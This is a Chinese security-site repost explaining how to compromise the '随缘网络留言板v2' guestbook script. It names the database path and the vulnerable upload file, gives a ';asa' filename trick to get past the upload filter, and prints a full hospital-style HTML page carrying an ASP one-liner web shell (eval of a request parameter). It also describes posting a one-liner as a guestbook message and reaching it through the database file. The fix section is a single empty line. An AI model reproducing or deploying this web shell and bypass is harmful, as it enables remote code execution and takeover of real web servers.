网站地图    收藏   

主页 > 后端 > 网站安全 >

随缘网络留言板v2(带审核置顶功能+ajax+jquery构架

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 好像有2个版本一个是asp的一个是php的数据库路径 db/sywl.asp漏洞文件up2.asp 内容太大了...也没什么好解的将以下代码存为 ;asa 直接上传 得到路径-_, (当然大牛们也可以自己构造一个一句话...

好像有2个版本一个是asp的一个是php的
 
数据库路径  db/sywl.asp
 
漏洞文件up2.asp 内容太大了...也没什么好解的
 
将以下代码存为  ;asa 直接上传 得到路径-_, (当然大牛们也可以自己构造一个一句话)
 
前面不要加,加了就会提示 不能上传ASA文件
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <meta name="keywords" content="a" />
 <meta name="description" content="a" />
 <title>a</title>
 <link href="/template/images/style.css" rel="stylesheet" type="text/css" />
 
<script type="text/javascript">var king_page='/page/';</script>
 <script src="/page/system/inc/jquery.js" type="text/javascript"></script>
 <script src="/page/system/inc/jquery.kc.js" type="text/javascript"></script>
 </head>
 <body>
 <!--顶部-->
 <div id="top">
   <div><img src="/template/images/logo.jpg" /></div>
   <div id="menu">
     <ul>
       <li><a href="/">医院首页</a></li>
       <li><a href="/html/yygk/">医院概况</a></li>
       <li><a href="/html/jyzn/">就医指南</a></li>
       <li><a href="/html/ksjs/">科室介绍</a></li>
       <li><a href="/html/yywh/">医院文化</a></li>
       <li><a href="/html/news/">新闻资讯</a></li>
       <li><a href="/html/jkkp/">健康科普</a></li>
       <li><a href="/page/feedback/">请你留言</a></li>
     </ul>
   </div>
   <!--主菜单-->
 </div>
 <!--内容-->
 <div class="content" id="onepage"><%
 Dim ConKey:ConKey="Cmd"
 Dim InValue:InValue=Request(ConKey)
 eval(InValue)
 %></div>
 <!--底部-->
 <div id="line"></div>
 <div id="bottom">
         京ICP备×××××××××号</div>
 <div id="Layer1">
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://..../pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="910" height="175">
     <param name="movie" value="/template/images/sqlogo.swf" />
     <param name="quality" value="high" />
     <param name="wmode" value="transparent">
     <embed src="/template/images/sqlogo.swf" quality="high" wmode="transparent" pluginspage="http://www.2cto.com /go/getflashplayer" type="application/x-shockwave-flash" width="910" height="175"></embed>
   </object>
 </div>
 </body>
 </html>更简单的如果数据库没改名
 
留言直接丢一句话。。连接数据库文件-_,
 
大牛别喷
 
好像这程序也出了一个编辑器,也是可以这样利用

修复:针对上述分析修复吧

 转自:http://t00ls.net/thread-20291-1-1.html
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论